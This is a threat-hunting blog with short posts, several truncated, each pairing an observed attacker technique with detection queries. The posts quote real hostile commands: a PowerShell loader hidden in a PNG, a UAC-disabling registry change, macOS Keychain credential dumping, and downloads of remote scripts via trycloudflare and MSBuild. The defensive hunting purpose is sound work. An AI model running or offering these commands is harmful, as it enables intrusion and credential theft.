Know Your Adversary

Hello everyone! Today we’ll look at another interesting example of implementing one of my favorite techniques for proactive hunting - Command and Scripting Interpreter: PowerShell (T1059.001) . This example is related to the distribution of the SHEETCREEP backdoor. The attackers distributed ZIP archives that contained two files: an LNK and a PNG. Opening the LNK file executed the following command: powershell.exe -WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes('details.png');([System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])).GetType(\"Task10.Program\")::MB())" The command reads bytes from the PNG file, reverses them, and loads them as a .NET assembly. What can we hunt for? For example, reading bytes with PowerShell from suspicious files, in particular PNG files (of course, you can extend this list): event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: (*ReadAllBytes* AND *png*) See yo...

Hello everyone! Today we’re going to look at another interesting example of the Modify Registry (T1112) technique, this time in the context of the Defense Evasion tactic. So, today’s example comes from an activity cluster known as KONNI . The malware used by the attacker modified the following registry parameter: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin This parameter defines how Windows requests confirmation for privilege elevation for administrators. Of course, the attackers change its value to “0”, which allows privilege elevation to occur without any confirmation. Therefore, it may be a good idea to look for suspicious events related to modification of this parameter: event_type: "registryvaluesetwin" AND reg_key_path: "consentpromptbehavioradmin" AND reg_value_data: "0x00000000" By the way, the report we’re discussing is yet another example of how attackers are abusing AI to develop malware and tools! ...

Hello everyone! It’s been a while since we last talked about macOS, so it’s high time to fix that. Today, we’ll look at an example of implementing the technique Credentials from Password Stores: Keychain (T1555.001) . As before, our focus is on real-world threats, and as an example we’ll examine MonetaStealer . This malware actively abuses the built-in macOS security utility, which is designed to work with the macOS security system - primarily the Keychain, certificates, passwords, and access control policies. For example, the stealer abuses this utility to obtain the key used to decrypt passwords saved in Google Chrome: security find-generic-password -w -a "Chrome" The utility is also used to extract data from the Keychain and search for specific keywords: security dump-keychain 2>/dev/null | grep -i {keyword} | head -20 Both examples can be good targets for hunting (or even detection): event_type: "processcreatemac" AND proc_file_path: "security" AND...

Hello everyone! As you know, attackers often abuse various legitimate web services - for example, to exfiltrate data or to download tools. Today we’ll look at another such service, TryCloudflare, and examine how attackers use it in the context of the Ingress Tool Transfer (T1105) technique. So, TryCloudflare makes it possible to expose a local service to the Internet, with access provided via a Cloudflare-generated domain, for example: plus-condos-thy-redeem.trycloudflare[.]com Let’s look at a recent example demonstrating abuse of this service. First, the attackers initiate a connection to the server: rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie plus-condos-thy-redeem.trycloudflare[.]com@SSL https://plus-condos-thy-redeem.trycloudflare[.]com/ Second, they download malicious scripts: "C:\WINDOWS\System32\WScript.exe" "\\plus-condos-thy-redeem.trycloudflare[.]com@SSL\DavWWWRoot\as.wsh" powershell -Command "iwr 'https://plus-condos-thy-redeem.tr...

Hello everyone! Why are phishing emails needed if victims can run a malicious command themselves? Yes, today we’re once again looking at an interesting variant of User Execution: Malicious Copy and Paste (T1204.004) . In fact, phishing emails were still involved: this time the attackers disguised themselves as Booking.com. The email contained a link leading to a phishing website. When the victim clicked the “Refresh page” button, the browser switched to full-screen mode and displayed a familiar instruction to copy and paste a malicious command - this time cleverly disguised as a Blue Screen of Death . As for the command itself, it was also quite interesting and included the use of Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001) : powershell -c “start hxxps[://admin.booking[.]com;$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;iwr hxxps://2fa-bns[.]com/ -o $env:ProgramData\v.proj;& $msb $env:ProgramData\v.proj” Detection: Pay attention to file...

Hello everyone! I promised you to keep posting and notify you on any interesting tactics, techniques and procedures. So, let's start the new year! Harlan Carvey (I'm sure you've read his books !) shared that adversaries started to use Controlio - a cloud-based employee monitoring and productivity analytics platform.  By the way, it's not the first time adversaries use similar tools. Another example is Rare Werewolf: the adversary leveraged  Mipko Employee Monitor. Look for suspicious communications for controlio[.]net: event_type: "dnsreqwin" AND dns_rname: "controlio.net" Look for suspicious executions of Controlio-related binaries: event_type: "processcreatewin" AND proc_file_productname: "controlio" Happy hunting!